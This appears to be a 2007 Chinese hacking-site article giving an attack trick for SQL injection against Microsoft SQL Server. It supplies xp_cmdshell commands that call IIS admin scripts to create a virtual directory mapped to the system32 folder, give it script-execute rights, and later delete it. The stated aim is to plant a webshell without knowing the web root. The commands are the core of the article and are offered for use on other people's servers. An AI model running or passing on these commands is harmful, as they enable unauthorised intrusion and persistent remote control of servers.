·搜黑-全球首例黑客资讯搜索
·视频-国内视频学习教学大全
·设计-汇集百家设计网站精华
·编程-13大编程语言全面学习
安全中国首页 > 文章中心 > 综合注入文章
SQL注入建立虚拟目录,免得找Web绝对路径!
http://www.anqn.com     时间:2007-8-26 0:34:30      责任编辑:孟翔飞      网友评论
热 点:

我们很多情况下都遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错:

exec master.dbo.xp_cmdshell ’cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"’
建立虚拟目录win,指向c:\winnt\system32
exec master.dbo.xp_cmdshell ’cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture’
让win句有解析asp脚本权限

exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/"
删除虚拟目录。
找不到web绝对路径的一种解决办法,

http://21o.net/h4x0r
403错误,表示虚拟目录建好了。

·上一篇: 注射MSSQL时解决的一个未有人提到过的问题
·下一篇: 手工注射Php网站脚本学习技术

发表评论  打印本文  返回顶部  关闭窗口
最新5条评论 条评论
条评论
名称: 信箱:

相关连接
·最详细的SQL注入相关的命令整理--以索尼中国为例 [2007-8-26]
·Mssql注入通杀,只要有注入点就有系统权限 [2007-8-25]
·用Vbs来写sql注入等80端口的攻击脚本 [2007-8-25]
·SQL注入Access导出WebShell的方法 [2007-8-25]
·通用防SQL注入函数Java版源代码 [2007-8-24]
·存储过程之外:SQL注入深入防御 [2007-8-24]
·再谈SQL注入与ASP木马上传的综合方法 [2007-8-23]
·存储过程之外:SQL注入深入防御 [2007-8-22]
·SQL Server安全之加密术和SQL注入攻击 [2007-8-20]
·推荐:Discuz! 4.0存在SQL注入漏洞 [2007-8-20]